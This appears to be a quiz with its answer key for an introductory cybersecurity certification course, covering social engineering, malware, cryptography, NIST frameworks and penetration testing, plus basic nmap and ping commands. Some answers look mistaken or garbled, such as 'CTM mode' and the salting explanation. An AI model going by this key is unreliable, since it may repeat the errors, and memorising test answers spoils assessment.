Lesson 1-5
Which of the following depict ways a malicious attacker can gain access to a target's network?
A. Phishing B. Shoulder surfing
A user's PC is infected with a virus that appears to be memory resident and loads anytime it is booted from an external universal serial bus (USB) thumb drive. Examine the following options and determine which describes the infection type.
Boot virus
Evaluate the differences between stream and block ciphers and select the true statement.
A block cipher is padded to the correct size if there is not enough data in the plaintext.
Analyze the following attacks to determine which best illustrates a pharming attack.
A customer enters the correct URL address of their bank, which should point to the IP address 172.1.24.4. However, the browser goes to 168.254.1.1, which is a fake site designed to look exactly like the real bank site.
Select the statement which best describes the difference between a zero-day vulnerability and a legacy platform vulnerability.
A legacy platform vulnerability is typically unpatchable, while a zero-day vulnerability may be exploited before a developer can create a patch for it.
Which of the following statements summarizes a disadvantage to performing an active vulnerability scan?
A. Active scanning consumes more network bandwidth. B. Active scanning runs the risk of causing an outage.
Encryption vulnerabilities allow unauthorized access to protected data. Which component is subject to brute-force enumeration?
A weak cipher
Which statement best illustrates the importance of a strong true random number generator (TRNG) or pseudo-random number generator (PRNG) in a cryptographic implementation?
A weak number generator leads to many published keys sharing a common factor.
The IT department head returns from an industry conference feeling inspired by a presentation on the topic of cybersecurity frameworks. A meeting is scheduled with IT staff to brainstorm ideas for deploying security controls by category and function throughout the organization. Which of the following ideas are consistent with industry definitions?
A. Deploy a technical control to enforce network access policies. B. Schedule quarterly security awareness workshops as a preventive control to prevent social engineering attacks. C. Deploy agents to file servers to perform continuous backups to cloud storage as a corrective control to mitigate the impact of malware.
In which of these situations might a non-credentialed vulnerability scan be more advantageous than a credentialed scan?
A. External assessments of a network perimeter B. Web application scanning
Which of the following is the best example of an insider threat?
A. Former employee B. Contractor
An employee calls IT personnel and states that they received an email with a PDF document to review. After the PDF was opened, the system has not been performing correctly. An IT admin conducted a scan and found a virus. Determine the two classes of viruses the computer most likely has.
A. Macro B. Script
One aspect of threat modeling is to identify potential threat actors and the risks associated with each one. When assessing the risk that any one type of threat actor poses to an organization, what are the most critical factors to profile?
A. Motivation B. Intent
A contractor has been hired to conduct security reconnaissance on a company. The contractor browses the company's website to identify employees and then finds their Facebook pages. Posts found on Facebook indicate a favorite bar that employees frequently visit. The contractor visits the bar and learns details of the company's security infrastructure through small talk. What reconnaissance phase techniques does the contractor practice?
A. Open Source Intelligence (OSINT) B. Social engineering
A malicious party adds malware to a popular video game and offers free copies to users. The party's objective is to require the CD to be inserted during use. This software will gain administrative rights, change system files, and may hide from detection without the knowledge or consent of the user. Consider the malware characteristics and determine which may be used.
A. Rootkit B. Trojan
During a penetration test, an adversary operator sends an encrypted message embedded in an attached image. Analyze the scenario to determine what techniques the operator is relying on to hide the message.
A. Security by obscurity B. Confidentiality
A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task.
A. Test security controls B. Exploit vulnerabilities
An outside security consultant updates a company's network, including data cloud storage solutions. The consultant leaves the manufacturer's default settings when installing network switches, assuming the vendor shipped the switches in a default-secure configuration. Examine the company's network security posture and select the statements that describe key vulnerabilities in this network.
A. The network is open to third-party risks from using an outside contractor to configure cloud storage settings. B. The default settings in the network switches represent a weak configuration.
Following a data breach at a large retail company, their public relations team issues a statement emphasizing the company's commitment to consumer privacy. Identify the true statements concerning this event.
A. The privacy breach may allow the threat actor to sell the data to other malicious actors. B. The data breach can cause data to be exfiltrated.
Select the appropriate methods for packet capture.
A. Wireshark B. tcpdump
An IT manager in the aviation sector checks the industry's threat intelligence feed to keep up on the latest threats and ensure the work center implements the best practices in the field. What type of threat intelligence source is the IT manager most likely accessing?
An Information Sharing and Analysis Center (ISAC)
What is the trade-off when considering which type of encryption cipher to use?
Asymmetric encryption involves substantially more computing overhead than symmetric encryption. Asymmetric encryption is inefficient when encrypting a large amount of data on a disk or transporting it over a network.
Which statement most accurately describes the mechanisms by which blockchain ensures information integrity and availability?
Blockchain ensures availability through decentralization, and integrity through cryptographic hashing and timestamping.
A manufacturing company hires a pentesting firm to uncover any vulnerabilities in their network with the understanding that the pen tester receives no information about the company's system. Which of the following penetration testing strategies is the manufacturing company requesting?
Black box
Compare and contrast the modes of operation for block ciphers. Which of the following statements is true?
CTM mode allows block ciphers to behave like stream ciphers.
A security team is in the process of selecting a cryptographic suite for their company. Analyze cryptographic implementations and determine which of the following performance factors is most critical to this selection process if users primarily access systems on mobile devices.
Computational overhead
The _____ requires federal agencies to develop security policies for computer systems that process confidential information.
Computer Security Act
What does the CIA Triad stand for?
Confidentiality Integrity Availability
A system administrator has just entered their credentials to enter a secure server room. As the administrator is entering the door, someone is walking up to the door with their hands full of equipment and appears to be struggling to move items around while searching for their credentials. The system administrator quickly begins to assist by getting items out of the person's hands, and they walk into the room together. This person is not an employee, but someone attempting to gain unauthorized access to the server room. What type of social engineering has occurred?
Consensus/social proof
After a poorly handled security breach, a company updates its security policy to include an improved incident response plan. Which of the following security controls does this update address?
Corrective
A system analyst is tasked with searching the dark web for harvested customer data. Because these sites cannot be readily found in standard website searches, what is often gained by "word of mouth" bulletin boards to assist in reaching the desired page?
Dark Website URL
Which of the following utilizes both symmetric and asymmetric encryption?
Digital envelope
An employee works on a small team that shares critical information about the company's network. When sending emails that have this information, what would be used to provide the identity of the sender and prove that the information has not been tampered with?
Digital signature
A client contacts a server for a data transfer. Instead of requesting TLS1.3 authentication, the client claims legacy systems require the use of SSL. What type of attack might a data transfer using this protocol facilitate?
Downgrade
Which statement describes the mechanism by which encryption algorithms help protect against birthday attacks?
Encryption algorithms add salt when computing password hashes.
A network administrator uses an automated vulnerability scanner. It regularly updates with the latest vulnerability feeds. If the system regularly performs active scans and returns the presence of vulnerabilities when they do not exist, what type of error is the system most likely making?
False positive
A hospital must balance the need to keep patient privacy information secure and the desire to analyze the contents of patient records for a scientific study. What cryptographic technology can best support the hospital's needs?
Homomorphic encryption
The National Institute of Standards and Technology (NIST) provides a framework that classifies security-related functions. Which description aligns with the "respond" function?
Identify, analyze, and eradicate threats.
Which statement best explains the differences between black box, white box, and gray box attack profiles used in penetration testing?
In a black box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a white box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance.
Analyze and eliminate the item that is NOT an example of a reconnaissance technique.
Initial exploitation
How might the goals of basic network management not align with the goals of security?
Management focuses on availability over confidentiality.
A company has an annual contract with an outside firm to perform a security audit on their network. The purpose of the annual audit is to determine if the company is in compliance with their internal directives and policies for security control. Select the broad class of security control that accurately demonstrates the purpose of the audit.
Managerial
What control category are controls that give oversight of the system?
Managerial
Which security related phrase relates to the integrity of data?
Modification
Which of the following has a cyber security framework (CSF) that focuses exclusively on IT security, rather than IT service provisioning?
National Institute of Standards and Technology (NIST)
What does it mean when subjects cannot deny creating or modifying data?
Non-repudiation
An engineer looks to implement security measures by following the five functions in the National Institute of Standards and Technology (NIST) Cybersecurity Framework. When documenting the "detect" function, what does the engineer focus on?
Ongoing proactive monitoring
Examine each attack vector. Which is most vulnerable to escalation of privileges?
Operating System (OS)
What control category are controls that depend on a person for implementation?
Operational
When using a digital envelope to exchange key information, the use of what key agreement mitigates the risk inherent in the Rivest-Shamir-Adleman (RSA) algorithm, and by what means?
Perfect forward secrecy (PFS) uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key.
A hacker sets up a C2 network to control a compromised host. What refers to the hacker's ability to reconnect to the compromised host and use it as a RAT or backdoor?
Persistence
Examine each statement and determine which most accurately describes a major limitation of quantum computing technology.
Presently, quantum computers do not have the capacity to run useful applications.
Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message?
Public key cryptography and hashing
An individual receives a text message that appears to be a warning from a well-known order fulfillment company, informing them that the carrier has tried to deliver his package twice, and that if the individual does not contact them to claim it, the package will not be delivered. Analyze the scenario and select the social engineering technique being used.
SMiShing
Which of the following is NOT a use of cryptography?
Security through obscurity
An employee is having coffee at an outdoor coffee shop and is not taking precautions against someone watching their screen while working on a company project. A person a few tables over watches the employee enter their credentials and then takes photos of the work they are completing with their smartphone. Which form of social engineering is being used in this situation?
Shoulder surfing
A hacker is able to install a keylogger on a user's computer. What is the hacker attempting to do in this situation?
Steal confidential information
An attacker uses a cryptographic technology to create a covert message channel in transmission control protocol (TCP) packet data fields. What cryptographic technique does this attack strategy employ?
Steganography
Which statement best describes key differences between symmetric and asymmetric cryptographic ciphers?
Symmetric encryption is primarily used for encrypting large volumes of data and uses the same key for encryption and decryption.
What control category controls implementation in operating system, systems, and security appliances?
Technical
What are the security control categories?
Technical Operational Managerial
Any external responsibility for an organization's security lies mainly with which individuals?
The senior executives
During a penetration test, systems administrators for a large company are tasked to play on the white team for an affiliated company. Examine each of the following roles and determine which role the systems admins will fill.
The systems admins will arbitrate the exercise, setting rules of engagement and guidance.
A security technician needs to transfer a large file to another user in a data center. Which statement best illustrates what type of encryption the technician should use to perform the task?
The technician should use asymmetric encryption to verify the data center user's identity and agree on a symmetric encryption algorithm for the data transfer.
A security engineer is investigating a potential system breach. When compiling a report of the incident, how does the engineer classify the actor and the vector?
Threat
An IT director reads about a new form of malware that targets a system widely utilized in the company's network. The director wants to discover whether the network has been targeted, but also wants to conduct the scan without disrupting company operations or tipping off potential attackers to the investigation. Evaluate vulnerability scanning techniques and determine the best tool for the investigation.
Threat hunting
Which situation would require keyboard encryption software be installed on a computer?
To protect against spyware
A Department of Defense (DoD) security team identifies a data breach in progress, based on some anomalous log entries, and take steps to remedy the breach and harden their systems. When they resolve the breach, they want to publish the cyber threat intelligence (CTI) securely, using standardized language for other government agencies to use. The team will transmit threat data feed via which protocol?
Trusted Automated eXchange of Indicator Information (TAXII)
An unknowing user with authorized access to systems in a software development firm installs a seemingly harmless, yet unauthorized program on a workstation without the IT department's sanction. Identify the type of threat that is a result of this user's action.
Unintentional insider threat
What is Open Source Intelligence (OSINT)?
Using web search tools and social media to obtain information about the target
A system administrator downloads and installs software from a vendor website. Soon after installing the software, the administrator's computer is taken over remotely. After closer investigation, the software package was modified, probably while it was downloading. What action could have prevented this incident from occurring?
Validate the software using a checksum
A company technician goes on vacation. While the technician is away, a critical patch released for Windows servers is not applied. According to the National Institute of Standards and Technology (NIST), what does the delay in applying the patch create on the server?
Vulnerability
Compare and contrast vulnerability scanning and penetration testing. Select the true statement from the following options.
Vulnerability scanning by eavesdropping is passive, while penetration testing with credentials is active.
A system administrator must scan the company's web-based application to identify which ports are open and which operating system can be seen from the outside world. Determine the syntax that should be used to yield the desired information if the administrator will be executing this task from a Linux command line.
nmap -O
A network manager needs a map of the network's topology. The network manager is using Network Mapper (Nmap) and will obtain the visual map with the Zenmap tool. If the target IP address is 192.168.1.1, determine the command within Nmap that will return the necessary data to build the visual map of the network topology.
nmap -sn --traceroute 192.168.1.1
Identify the command that can be used to detect the presence of a host on a particular IP address.
ping